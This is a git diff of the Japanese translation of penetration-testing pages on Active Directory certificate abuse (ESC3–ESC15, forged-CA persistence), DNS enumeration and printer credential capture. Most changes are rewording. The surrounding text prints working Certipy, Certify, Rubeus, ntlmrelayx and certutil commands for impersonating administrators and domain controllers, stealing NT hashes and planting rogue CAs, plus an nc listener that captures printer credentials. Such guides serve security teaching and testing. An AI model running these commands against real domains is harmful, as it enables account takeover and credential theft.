-**「登録エージェント」**はそのような**テンプレート**に登録し、結果として得られた**証明書を使用して他のユーザーの代理でCSRに共同署名**します。その後、**共同署名されたCSR**をCAに**送信**し、「代理で登録することを許可する」**テンプレート**に登録し、CAは**「他の」ユーザーに属する証明書**で応答します。
+**「登録エージェント」**はそのような**テンプレート**に登録し、結果として得られた**証明書を使用して他のユーザーの代理でCSRに共同署名**します。その後、**共同署名されたCSR**をCAに**送信**し、**「代理で登録することを許可する」**テンプレートに登録し、CAは**「他の」ユーザーに属する証明書**で応答します。
 
 **要件 1:**
 
 - エンタープライズCAによって低特権ユーザーに登録権が付与されます。
 - マネージャーの承認要件は省略されます。
 - 認可された署名の要件はありません。
-- 証明書テンプレートのセキュリティ記述子は過度に許可的で、低特権ユーザーに登録権を付与します。
+- 証明書テンプレートのセキュリティ記述子は過度に許可的であり、低特権ユーザーに登録権を付与します。
 - 証明書テンプレートには証明書要求エージェントEKUが含まれており、他の主体の代理で他の証明書テンプレートの要求を可能にします。
 
 **要件 2:**
@@ -98,12 +98,12 @@ ADフォレストの構成スキーマ内でこのシナリオに一致するテ
 - エンタープライズCAは低特権ユーザーに登録権を付与します。
 - マネージャーの承認はバイパスされます。
 - テンプレートのスキーマバージョンは1または2を超え、証明書要求エージェントEKUを必要とするアプリケーションポリシー発行要件を指定します。
-- 証明書テンプレートで定義されたEKUはドメイン認証を許可します。
+- 証明書テンプレートに定義されたEKUはドメイン認証を許可します。
 - CAに対して登録エージェントの制限は適用されません。
 
 ### 悪用
 
-このシナリオを悪用するには、[**Certify**](https://github.com/GhostPack/Certify)または[**Certipy**](https://github.com/ly4k/Certipy)を使用できます。
+このシナリオを悪用するには、[**Certify**](https://github.com/GhostPack/Certify)または[**Certipy**](https://github.com/ly4k/Certipy)を使用できます：
 ```bash
 # Request an enrollment agent certificate
 Certify.exe request /ca:DC01.DOMAIN.LOCAL\DOMAIN-CA /template:Vuln-EnrollmentAgent
@@ -117,7 +117,7 @@ certipy req -username john@corp.local -password Pass0rd! -target-ip ca.corp.loca
 # Use Rubeus with the certificate to authenticate as the other user
 Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password:asdf
 ```
-**ユーザー**が**登録エージェント証明書**を**取得**することを許可されている場合、登録**エージェント**が登録することを許可されているテンプレート、および登録エージェントが行動することができる**アカウント**は、エンタープライズCAによって制約されることがあります。これは、`certsrc.msc` **スナップイン**を開き、**CAを右クリック**し、**プロパティをクリック**し、次に「登録エージェント」タブに**移動**することで実現されます。
+**ユーザー**が**登録エージェント証明書**を**取得**することを許可されている場合、登録**エージェント**が登録を許可されているテンプレート、および登録エージェントが行動できる**アカウント**は、エンタープライズCAによって制約されることがあります。これは、`certsrc.msc` **スナップイン**を開き、**CAを右クリック**し、**プロパティをクリック**し、次に「登録エージェント」タブに**移動**することで実現されます。
 
 ただし、CAの**デフォルト**設定は「**登録エージェントを制限しない**」ことに注意が必要です。管理者によって登録エージェントの制限が有効にされ、「登録エージェントを制限する」に設定されると、デフォルトの構成は非常に許可的なままです。これにより、**すべての人**が誰でもすべてのテンプレートに登録することができます。
 
@@ -129,7 +129,7 @@ Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password
 
 **攻撃者**が**テンプレート**を**変更**し、**前のセクション**で概説された**悪用可能な誤設定**を**導入**するために必要な**権限**を持っている場合、特権昇格が促進される可能性があります。
 
-証明書テンプレートに適用される注目すべき権限には以下が含まれます：
+証明書テンプレートに適用される主な権限には以下が含まれます：
 
 - **オーナー:** オブジェクトに対する暗黙の制御を付与し、任意の属性を変更することを可能にします。
 - **フルコントロール:** オブジェクトに対する完全な権限を付与し、任意の属性を変更する能力を含みます。
@@ -143,7 +143,7 @@ Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password
 
 <figure><img src="../../../images/image (814).png" alt=""><figcaption></figcaption></figure>
 
-ESC4は、ユーザーが証明書テンプレートに対して書き込み権限を持っている場合です。これは、例えば、証明書テンプレートの構成を上書きして、テンプレートをESC1に対して脆弱にするために悪用される可能性があります。
+ESC4は、ユーザーが証明書テンプレートに対して書き込み権限を持っている場合です。これは、たとえば、証明書テンプレートの構成を上書きして、テンプレートをESC1に対して脆弱にするために悪用される可能性があります。
 
 上記のパスに見られるように、`JOHNPC`のみがこれらの権限を持っていますが、私たちのユーザー`JOHN`は`JOHNPC`への新しい`AddKeyCredentialLink`エッジを持っています。この技術は証明書に関連しているため、私はこの攻撃も実装しました。これは[Shadow Credentials](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)として知られています。ここでは、被害者のNTハッシュを取得するためのCertipyの`shadow auto`コマンドの小さなスニークピークを示します。
 ```bash
@@ -164,9 +164,9 @@ certipy template -username john@corp.local -password Passw0rd -template ESC4-Tes
 
 ### 説明
 
-証明書テンプレートや証明書認証局を超えるいくつかのオブジェクトを含む、ACLベースの相互接続された関係の広範なウェブは、AD CSシステム全体のセキュリティに影響を与える可能性があります。これらのオブジェクトは、セキュリティに大きな影響を与える可能性があり、以下を含みます：
+証明書テンプレートや証明書認証局を超えた複数のオブジェクトを含むACLベースの関係の広範なネットワークは、AD CSシステム全体のセキュリティに影響を与える可能性があります。これらのオブジェクトは、セキュリティに大きな影響を与える可能性があり、以下を含みます：
 
-- CAサーバーのADコンピュータオブジェクトは、S4U2SelfやS4U2Proxyのようなメカニズムを通じて侵害される可能性があります。
+- CAサーバーのADコンピュータオブジェクトは、S4U2SelfやS4U2Proxyなどのメカニズムを通じて侵害される可能性があります。
 - CAサーバーのRPC/DCOMサーバー。
 - 特定のコンテナパス `CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>` 内の任意の子孫ADオブジェクトまたはコンテナ。このパスには、証明書テンプレートコンテナ、認証局コンテナ、NTAuthCertificatesオブジェクト、エンロールメントサービスコンテナなどのコンテナやオブジェクトが含まれますが、これに限定されません。
 
@@ -176,9 +176,9 @@ certipy template -username john@corp.local -password Passw0rd -template ESC4-Tes
 
 ### 説明
 
-[**CQure Academyの投稿**](https://cqureacademy.com/blog/enhanced-key-usage)で議論されている主題は、Microsoftによって概説された**`EDITF_ATTRIBUTESUBJECTALTNAME2`**フラグの影響にも触れています。この設定は、認証局（CA）で有効にされると、**ユーザー定義の値**を**任意のリクエスト**の**サブジェクト代替名**に含めることを許可します。これには、Active Directory®から構築されたリクエストも含まれます。したがって、この規定により、**侵入者**はドメイン**認証**のために設定された**任意のテンプレート**を通じて登録することが可能になります。特に、標準のユーザーテンプレートのように**特権のない**ユーザー登録に開放されているものです。その結果、証明書が取得され、侵入者はドメイン管理者またはドメイン内の**他のアクティブなエンティティ**として認証できるようになります。
+[**CQure Academyの投稿**](https://cqureacademy.com/blog/enhanced-key-usage)で議論されている主題は、Microsoftによって概説された**`EDITF_ATTRIBUTESUBJECTALTNAME2`**フラグの影響にも触れています。この設定は、認証局（CA）で有効にされると、**ユーザー定義の値**を**任意のリクエスト**の**代替名**に含めることを許可します。これには、Active Directory®から構築されたリクエストも含まれます。したがって、この規定により、**侵入者**はドメイン**認証**のために設定された**任意のテンプレート**を通じて登録することが可能になります。特に、標準のユーザーテンプレートのように**特権のない**ユーザー登録に開放されているものです。その結果、証明書が取得され、侵入者はドメイン管理者またはドメイン内の**他のアクティブなエンティティ**として認証できるようになります。
 
-**注意**: 証明書署名要求（CSR）に**代替名**を追加する方法は、`certreq.exe`の`-attrib "SAN:"`引数を通じて（「名前値ペア」と呼ばれる）行われ、ESC1におけるSANの悪用戦略とは**対照的**です。ここでの違いは、**アカウント情報がどのようにカプセル化されるか**にあります—拡張ではなく、証明書属性内にあります。
+**注意**: 証明書署名要求（CSR）に**代替名**を追加する方法は、`certreq.exe`の`-attrib "SAN:"`引数を通じて行われ（「名前値ペア」と呼ばれる）、ESC1におけるSANの悪用戦略とは**対照的**です。ここでの違いは、**アカウント情報がどのようにカプセル化されるか**にあります—拡張ではなく、証明書属性内にあります。
 
 ### 悪用
 
@@ -203,7 +203,7 @@ certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target
 ```bash
 certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
 ```
-この設定を環境で無効にするには、フラグを次のように削除できます:
+この設定を環境で無効にするには、フラグを次のコマンドで削除できます:
 ```bash
 certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
 ```
@@ -217,11 +217,11 @@ certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJ
 
 #### 説明
 
-証明書認証局のアクセス制御は、CAのアクションを管理する一連の権限を通じて維持されます。これらの権限は、`certsrv.msc`にアクセスし、CAを右クリックしてプロパティを選択し、次にセキュリティタブに移動することで表示できます。さらに、PSPKIモジュールを使用して、次のようなコマンドで権限を列挙できます：
+証明書認証局のアクセス制御は、CAのアクションを管理する一連の権限を通じて維持されます。これらの権限は、`certsrv.msc`にアクセスし、CAを右クリックしてプロパティを選択し、セキュリティタブに移動することで表示できます。さらに、PSPKIモジュールを使用して、次のようなコマンドで権限を列挙できます：
 ```bash
 Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access
 ```
-これにより、主な権限、すなわち **`ManageCA`** と **`ManageCertificates`** が「CA管理者」と「証明書マネージャー」の役割にそれぞれ関連していることが示されます。
+これは、主な権限、すなわち **`ManageCA`** と **`ManageCertificates`** に関する洞察を提供し、それぞれ「CA管理者」と「証明書マネージャー」の役割に関連しています。
 
 #### 悪用
 
@@ -252,21 +252,21 @@ Certify.exe download /ca:dc.domain.local\theshire-DC-CA /id:336
 #### 説明
 
 > [!WARNING]
-> **前の攻撃**では、**`Manage CA`**権限を使用して**EDITF_ATTRIBUTESUBJECTALTNAME2**フラグを**有効に**して**ESC6攻撃**を実行しましたが、CAサービス（`CertSvc`）が再起動されるまで効果はありません。ユーザーが`Manage CA`アクセス権を持っている場合、そのユーザーは**サービスを再起動する**ことも許可されています。ただし、**ユーザーがリモートでサービスを再起動できることを意味するわけではありません**。さらに、ESC6は2022年5月のセキュリティ更新のため、ほとんどのパッチ適用環境では**そのままでは機能しない可能性があります**。
+> **前の攻撃**では、**`Manage CA`** 権限を使用して **EDITF_ATTRIBUTESUBJECTALTNAME2** フラグを **有効**にして **ESC6攻撃**を実行しましたが、CAサービス（`CertSvc`）が再起動されるまで効果はありません。ユーザーが `Manage CA` アクセス権を持っている場合、そのユーザーは **サービスを再起動することも許可されます**。ただし、**ユーザーがリモートでサービスを再起動できることを意味するわけではありません**。さらに、ESC6は2022年5月のセキュリティ更新のため、ほとんどのパッチ適用環境では **そのままでは機能しない可能性があります**。
 
 したがって、ここでは別の攻撃が提示されます。
 
 前提条件：
 
-- **`ManageCA`権限のみ**
-- **`Manage Certificates`**権限（**`ManageCA`**から付与可能）
-- 証明書テンプレート**`SubCA`**は**有効**でなければならない（**`ManageCA`**から有効にできる）
+- **`ManageCA` 権限のみ**
+- **`Manage Certificates`** 権限（**`ManageCA`** から付与可能）
+- 証明書テンプレート **`SubCA`** は **有効**でなければならない（**`ManageCA`** から有効にできる）
 
-この手法は、`Manage CA` _および_ `Manage Certificates`アクセス権を持つユーザーが**失敗した証明書リクエストを発行できる**という事実に依存しています。**`SubCA`**証明書テンプレートは**ESC1に対して脆弱**ですが、**管理者のみがテンプレートに登録できます**。したがって、**ユーザー**は**`SubCA`**への登録を**リクエスト**できますが、これは**拒否され**、その後**マネージャーによって発行されます**。
+この技術は、`Manage CA` _かつ_ `Manage Certificates` アクセス権を持つユーザーが **失敗した証明書リクエストを発行できる**という事実に依存しています。**`SubCA`** 証明書テンプレートは **ESC1に対して脆弱ですが**、**管理者のみがテンプレートに登録できます**。したがって、**ユーザー**は **`SubCA`** への登録を **リクエスト**できますが、これは **拒否され**、その後 **マネージャーによって発行されます**。
 
 #### 悪用
 
-自分自身に**`Manage Certificates`**アクセス権を付与するには、新しい担当者として自分のユーザーを追加できます。
+自分自身に **`Manage Certificates`** アクセス権を付与するには、新しい役員として自分のユーザーを追加できます。
 ```bash
 certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
 Certipy v4.0.0 - by Oliver Lyak (ly4k)
@@ -318,17 +318,17 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
 [*] Loaded private key from '785.key'
 [*] Saved certificate and private key to 'administrator.pfx'
 ```
-## NTLM Relay to AD CS HTTP Endpoints – ESC8
+## NTLMリレーによるAD CS HTTPエンドポイント – ESC8
 
 ### 説明
 
 > [!NOTE]
-> **AD CSがインストールされている**環境では、**脆弱なウェブ登録エンドポイント**が存在し、少なくとも1つの**証明書テンプレートが公開されている**場合、**ドメインコンピュータの登録とクライアント認証を許可する**（デフォルトの**`Machine`**テンプレートなど）と、**スプーラーサービスがアクティブな任意のコンピュータが攻撃者によって侵害される可能性があります**！
+> **AD CSがインストールされている**環境では、**脆弱なウェブ登録エンドポイント**が存在し、少なくとも1つの**証明書テンプレートが公開されている**場合、**ドメインコンピュータの登録とクライアント認証を許可する**（デフォルトの**`Machine`**テンプレートなど）、**スプーラーサービスがアクティブな任意のコンピュータが攻撃者によって侵害される可能性があります**！
 
-AD CSは、管理者がインストールできる追加のサーバーロールを通じて提供される、いくつかの**HTTPベースの登録方法**をサポートしています。これらのHTTPベースの証明書登録インターフェースは、**NTLMリレー攻撃**に対して脆弱です。攻撃者は、**侵害されたマシンから、受信NTLMを介して認証される任意のADアカウントを偽装することができます**。被害者アカウントを偽装している間、これらのウェブインターフェースにアクセスすることで、攻撃者は**`User`または`Machine`証明書テンプレートを使用してクライアント認証証明書を要求することができます**。
+AD CSは、管理者がインストールできる追加のサーバーロールを通じて利用可能な**HTTPベースの登録方法**をいくつかサポートしています。これらのHTTPベースの証明書登録インターフェースは、**NTLMリレー攻撃**に対して脆弱です。攻撃者は、**侵害されたマシンから、受信NTLMを介して認証される任意のADアカウントを偽装することができます**。被害者アカウントを偽装している間、これらのウェブインターフェースにアクセスすることで、攻撃者は**`User`または`Machine`証明書テンプレートを使用してクライアント認証証明書を要求することができます**。
 
 - **ウェブ登録インターフェース**（`http://<caserver>/certsrv/`で利用可能な古いASPアプリケーション）は、デフォルトでHTTPのみを使用し、NTLMリレー攻撃に対する保護を提供しません。さらに、Authorization HTTPヘッダーを通じてNTLM認証のみを明示的に許可しており、Kerberosのようなより安全な認証方法は適用できません。
-- **証明書登録サービス**（CES）、**証明書登録ポリシー**（CEP）Webサービス、および**ネットワークデバイス登録サービス**（NDES）は、デフォルトでAuthorization HTTPヘッダーを介してネゴシエート認証をサポートしています。ネゴシエート認証は**KerberosとNTLMの両方をサポート**しており、攻撃者はリレー攻撃中に**NTLMにダウングレード**することができます。これらのウェブサービスはデフォルトでHTTPSを有効にしていますが、HTTPSだけでは**NTLMリレー攻撃から保護されません**。HTTPSサービスのNTLMリレー攻撃からの保護は、HTTPSがチャネルバインディングと組み合わさった場合にのみ可能です。残念ながら、AD CSはIISでの認証のための拡張保護を有効にしておらず、チャネルバインディングに必要です。
+- **証明書登録サービス**（CES）、**証明書登録ポリシー**（CEP）ウェブサービス、および**ネットワークデバイス登録サービス**（NDES）は、デフォルトでAuthorization HTTPヘッダーを介してネゴシエート認証をサポートしています。ネゴシエート認証は**KerberosとNTLMの両方をサポート**しており、攻撃者はリレー攻撃中に**NTLMにダウングレード**することができます。これらのウェブサービスはデフォルトでHTTPSを有効にしていますが、HTTPSだけでは**NTLMリレー攻撃から保護されません**。HTTPSサービスのNTLMリレー攻撃からの保護は、HTTPSがチャネルバインディングと組み合わさった場合にのみ可能です。残念ながら、AD CSはIISでの認証のための拡張保護を有効にしておらず、チャネルバインディングに必要です。
 
 NTLMリレー攻撃の一般的な**問題**は、**NTLMセッションの短い期間**と、攻撃者が**NTLM署名を必要とするサービス**と対話できないことです。
 
@@ -404,15 +404,15 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
 このフラグの設定が重要になる条件は以下の通りです：
 
 - `StrongCertificateBindingEnforcement` が `2` に調整されていない（デフォルトは `1`）、または `CertificateMappingMethods` に `UPN` フラグが含まれている。
-- 証明書は `msPKI-Enrollment-Flag` 設定内で `CT_FLAG_NO_SECURITY_EXTENSION` フラグでマークされている。
-- 証明書によってクライアント認証EKUが指定されている。
+- 証明書が `msPKI-Enrollment-Flag` 設定内で `CT_FLAG_NO_SECURITY_EXTENSION` フラグでマークされている。
+- 証明書によってクライアント認証 EKU が指定されている。
 - 他のアカウントを妥協するために、任意のアカウントに対して `GenericWrite` 権限が利用可能である。
 
 ### 悪用シナリオ
 
 `John@corp.local` が `Jane@corp.local` に対して `GenericWrite` 権限を持ち、`Administrator@corp.local` を妥協することを目指しているとします。`Jane@corp.local` が登録を許可されている `ESC9` 証明書テンプレートは、その `msPKI-Enrollment-Flag` 設定に `CT_FLAG_NO_SECURITY_EXTENSION` フラグが設定されています。
 
-最初に、`Jane` のハッシュは `John` の `GenericWrite` により、Shadow Credentials を使用して取得されます：
+最初に、`Jane` のハッシュは `John` の `GenericWrite` によって、Shadow Credentials を使用して取得されます：
 ```bash
 certipy shadow auto -username John@corp.local -password Passw0rd! -account Jane
 ```
@@ -432,7 +432,7 @@ certipy req -username jane@corp.local -hashes <hash> -ca corp-DC-CA -template ES
 ```bash
 certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Jane@corp.local
 ```
-発行された証明書を使用して認証を試みると、`Administrator@corp.local`のNTハッシュが得られます。証明書にドメインの指定がないため、コマンドには`-domain <domain>`を含める必要があります:
+発行された証明書を使用して認証を試みると、`Administrator@corp.local`のNTハッシュが得られます。証明書にドメインの指定がないため、コマンドには`-domain <domain>`を含める必要があります：
 ```bash
 certipy auth -pfx adminitrator.pfx -domain corp.local
 ```
@@ -467,7 +467,7 @@ certipy shadow autho -username John@corp.local -p Passw0rd! -a Jane
 ```bash
 certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Administrator
 ```
-これに続いて、デフォルトの `User` テンプレートを使用して、`Jane` としてクライアント認証を有効にする証明書が要求されます。
+これに続いて、デフォルトの `User` テンプレートを使用して `Jane` としてクライアント認証を有効にする証明書が要求されます。
 ```bash
 certipy req -ca 'corp-DC-CA' -username Jane@corp.local -hashes <hash>
 ```
@@ -481,7 +481,7 @@ certipy auth -pfx administrator.pfx -domain corp.local
 ```
 ### Abuse Case 2
 
-`CertificateMappingMethods` に `UPN` ビットフラグ (`0x4`) が含まれている場合、`GenericWrite` 権限を持つアカウント A は、`userPrincipalName` プロパティを欠く任意のアカウント B を侵害することができます。これには、マシンアカウントや組み込みのドメイン管理者 `Administrator` も含まれます。
+`CertificateMappingMethods` に `UPN` ビットフラグ (`0x4`) が含まれている場合、`GenericWrite` 権限を持つアカウント A は、`userPrincipalName` プロパティを欠く任意のアカウント B を侵害することができます。これには、マシンアカウントや組み込みのドメイン管理者 `Administrator` が含まれます。
 
 ここでの目標は、`Jane` のハッシュを Shadow Credentials を通じて取得し、`GenericWrite` を利用して `DC$@corp.local` を侵害することです。
 ```bash
@@ -509,7 +509,7 @@ certipy auth -pfx dc.pfx -dc-ip 172.16.126.128 -ldap-shell
 ```
 この脆弱性は、`userPrincipalName`が欠如しているか、`sAMAccountName`と一致しない任意のユーザーアカウントにも拡張され、デフォルトの`Administrator@corp.local`は、その高いLDAP権限とデフォルトで`userPrincipalName`がないため、主要なターゲットとなります。
 
-## NTLMをICPRに中継 - ESC11
+## NTLMをICPRに中継する - ESC11
 
 ### 説明
 
@@ -534,7 +534,7 @@ ESC11                             : Encryption is not enforced for ICPR requests
 ```
 ### Abuse Scenario
 
-リレーサーバーを設定する必要があります：
+リレーサーバーを設定する必要があります:
 ```bash
 $ certipy relay -target 'rpc://DC01.domain.local' -ca 'DC01-CA' -dc-ip 192.168.100.100
 Certipy v4.7.0 - by Oliver Lyak (ly4k)
@@ -567,9 +567,9 @@ $ ntlmrelayx.py -t rpc://192.168.100.100 -rpc-mode ICPR -icpr-ca-name DC01-CA -s
 
 USBデバイスがCAサーバーにUSBポート経由で接続されている場合、またはCAサーバーが仮想マシンの場合はUSBデバイスサーバーが接続されている場合、YubiHSM内でキーを生成および利用するために、認証キー（時には「パスワード」と呼ばれる）が必要です。
 
-このキー/パスワードは、レジストリの`HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword`に平文で保存されています。
+このキー/パスワードは、`HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword`のレジストリに平文で保存されています。
 
-参照は[こちら](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm)です。
+[こちら](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm)を参照してください。
 
 ### 悪用シナリオ
 
@@ -591,7 +591,7 @@ $ certutil -csp "YubiHSM Key Storage Provider" -repairstore -user my <CA Common
 
 `msPKI-Certificate-Policy` 属性は、発行ポリシーを証明書テンプレートに追加することを許可します。ポリシーを発行する責任のある `msPKI-Enterprise-Oid` オブジェクトは、PKI OIDコンテナの構成命名コンテキスト (CN=OID,CN=Public Key Services,CN=Services) で発見できます。このオブジェクトの `msDS-OIDToGroupLink` 属性を使用して、ポリシーをADグループにリンクすることができ、システムは証明書を提示するユーザーをグループのメンバーであるかのように認可できます。[ここに参照](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53)。
 
-言い換えれば、ユーザーが証明書を登録する権限を持ち、その証明書がOIDグループにリンクされている場合、ユーザーはこのグループの特権を引き継ぐことができます。
+言い換えれば、ユーザーが証明書を登録する権限を持ち、証明書がOIDグループにリンクされている場合、ユーザーはこのグループの特権を引き継ぐことができます。
 
 [Check-ADCSESC13.ps1](https://github.com/JonasBK/Powershell/blob/master/Check-ADCSESC13.ps1) を使用してOIDToGroupLinkを見つけます:
 ```powershell
@@ -636,7 +636,6 @@ certipy req -u "John@domain.local" -p "password" -dc-ip 192.168.100.100 -target
 マルチフォレスト環境では、**証明書テンプレートを公開するエンタープライズCA**に関して注意が必要です。これにより、**認証されたユーザーまたは外部プリンシパル**（エンタープライズCAが属するフォレスト外のユーザー/グループ）に**登録および編集権限**が与えられます。\
 信頼を越えた認証の際、**認証されたユーザーSID**はADによってユーザーのトークンに追加されます。したがって、ドメインが**認証されたユーザーの登録権限を許可するテンプレートを持つエンタープライズCA**を持っている場合、異なるフォレストのユーザーが**テンプレートに登録される可能性があります**。同様に、**テンプレートによって外部プリンシパルに明示的に登録権限が付与されると**、**クロスフォレストアクセス制御関係が作成され**、あるフォレストのプリンシパルが**別のフォレストのテンプレートに登録できるようになります**。
 
-どちらのシナリオも、あるフォレストから別のフォレストへの**攻撃面の増加**につながります。証明書テンプレートの設定は、攻撃者によって悪用され、外部ドメインでの追加権限を取得することができます。
-
+どちらのシナリオも、あるフォレストから別のフォレストへの**攻撃面の増加**につながります。証明書テンプレートの設定は、攻撃者によって悪用され、外部ドメインでの追加権限を取得することができます。 
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
index 3a1a2814c..1295f3429 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
@@ -2,16 +2,16 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**これは、[https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)で共有されたドメイン持続性技術の概要です**。詳細については確認してください。
+**これは、[https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)で共有されているドメイン持続性技術の概要です**。詳細については確認してください。
 
 ## 盗まれたCA証明書を使用した証明書の偽造 - DPERSIST1
 
 証明書がCA証明書であることをどのように判断できますか？
 
-いくつかの条件が満たされる場合、証明書がCA証明書であることが判断できます：
+いくつかの条件が満たされると、証明書がCA証明書であることが判断できます：
 
 - 証明書はCAサーバーに保存されており、その秘密鍵はマシンのDPAPIによって保護されているか、オペレーティングシステムがサポートしている場合はTPM/HSMなどのハードウェアによって保護されています。
-- 証明書の発行者（Issuer）および対象（Subject）フィールドがCAの識別名と一致します。
+- 証明書の発行者（Issuer）および主題（Subject）フィールドがCAの識別名と一致します。
 - "CA Version"拡張がCA証明書にのみ存在します。
 - 証明書にはExtended Key Usage (EKU)フィールドがありません。
 
@@ -39,11 +39,11 @@ certipy auth -pfx administrator_forged.pfx -dc-ip 172.16.126.128
 > 証明書の偽造の対象となるユーザーは、プロセスが成功するためにアクティブであり、Active Directoryで認証できる必要があります。krbtgtのような特別なアカウントのために証明書を偽造することは効果がありません。
 
 この偽造された証明書は、指定された終了日まで**有効**であり、**ルートCA証明書が有効である限り**（通常は5年から**10年以上**）有効です。また、**マシン**にも有効であるため、**S4U2Self**と組み合わせることで、攻撃者はCA証明書が有効である限り、**任意のドメインマシンで持続性を維持**できます。\
-さらに、この方法で**生成された証明書は**、CAがそれらを認識していないため、**取り消すことができません**。
+さらに、この方法で**生成された証明書**は、CAがそれらを認識していないため、**取り消すことができません**。
 
 ## 悪意のあるCA証明書の信頼 - DPERSIST2
 
-`NTAuthCertificates`オブジェクトは、Active Directory（AD）が利用する`cacertificate`属性内に1つ以上の**CA証明書**を含むように定義されています。**ドメインコントローラー**による検証プロセスは、認証する**証明書**の発行者フィールドに指定された**CA**に一致するエントリを`NTAuthCertificates`オブジェクトで確認することを含みます。一致が見つかれば、認証が進行します。
+`NTAuthCertificates`オブジェクトは、Active Directory（AD）が利用する`cacertificate`属性内に1つ以上の**CA証明書**を含むように定義されています。**ドメインコントローラー**による検証プロセスは、認証する**証明書**の発行者フィールドに指定された**CA**と一致するエントリを`NTAuthCertificates`オブジェクトで確認することを含みます。一致が見つかれば、認証が進行します。
 
 自己署名のCA証明書は、攻撃者がこのADオブジェクトを制御している場合、`NTAuthCertificates`オブジェクトに追加できます。通常、**Enterprise Admin**グループのメンバーと、**forest rootのドメイン**内の**Domain Admins**または**Administrators**のみがこのオブジェクトを変更する権限を与えられます。彼らは、`certutil.exe`を使用して`NTAuthCertificates`オブジェクトを編集することができ、コマンド`certutil.exe -dspublish -f C:\Temp\CERT.crt NTAuthCA126`を使用するか、[**PKI Health Tool**](https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/import-third-party-ca-to-enterprise-ntauth-store#method-1---import-a-certificate-by-using-the-pki-health-tool)を使用します。
 
diff --git a/src/windows-hardening/active-directory-methodology/ad-dns-records.md b/src/windows-hardening/active-directory-methodology/ad-dns-records.md
index 5324ba628..427f516fc 100644
--- a/src/windows-hardening/active-directory-methodology/ad-dns-records.md
+++ b/src/windows-hardening/active-directory-methodology/ad-dns-records.md
@@ -1,10 +1,10 @@
-# AD DNS Records
+# AD DNS レコード
 
 {{#include ../../banners/hacktricks-training.md}}
 
-デフォルトでは、Active Directoryの**すべてのユーザー**がドメインまたはフォレストDNSゾーン内の**すべてのDNSレコードを列挙**できます。これはゾーン転送に似ています（ユーザーはAD環境内のDNSゾーンの子オブジェクトをリストできます）。
+デフォルトでは、Active Directory の **すべてのユーザー** がドメインまたはフォレスト DNS ゾーン内の **すべての DNS レコードを列挙** できます。これはゾーン転送に似ています（ユーザーは AD 環境内の DNS ゾーンの子オブジェクトをリストできます）。
 
-ツール[**adidnsdump**](https://github.com/dirkjanm/adidnsdump)は、内部ネットワークの偵察目的でゾーン内の**すべてのDNSレコードの列挙**と**エクスポート**を可能にします。
+ツール [**adidnsdump**](https://github.com/dirkjanm/adidnsdump) は、内部ネットワークの偵察目的でゾーン内の **すべての DNS レコードの列挙** と **エクスポート** を可能にします。
 ```bash
 git clone https://github.com/dirkjanm/adidnsdump
 cd adidnsdump
diff --git a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
index c3f76ad5b..03c2ecaae 100644
--- a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
+++ b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
@@ -1,6 +1,6 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-インターネット上には、**デフォルト/弱い**ログイン資格情報でLDAPが設定されたプリンターの危険性を**強調する**ブログがいくつかあります。\
+インターネット上には、**デフォルト/弱い**ログイン資格情報でLDAPが設定されたプリンターの危険性を**強調する**いくつかのブログがあります。\
 これは、攻撃者がプリンターを**不正なLDAPサーバーに対して認証させる**ことができるためです（通常、`nc -vv -l -p 444`で十分です）し、プリンターの**資格情報を平文でキャプチャ**することができます。
 
 また、いくつかのプリンターには**ユーザー名を含むログ**があり、ドメインコントローラーから**すべてのユーザー名をダウンロード**できる場合もあります。
@@ -30,18 +30,18 @@ sudo nc -k -v -l -p 386
 ```
 しかし、この方法の成功は異なります。
 
-### 方法 2: Slapd を使用したフル LDAP サーバー
+### 方法2: 完全なLDAPサーバーとSlapd
 
-より信頼性の高いアプローチは、フル LDAP サーバーを設定することです。なぜなら、プリンターは資格情報バインディングを試みる前に、ヌルバインドを実行し、その後クエリを行うからです。
+より信頼性の高いアプローチは、完全なLDAPサーバーを設定することです。なぜなら、プリンターは資格情報バインディングを試みる前に、ヌルバインドを実行し、その後クエリを行うからです。
 
-1. **LDAP サーバーのセットアップ**: ガイドは [このソース](https://www.server-world.info/en/note?os=Fedora_26&p=openldap) の手順に従います。
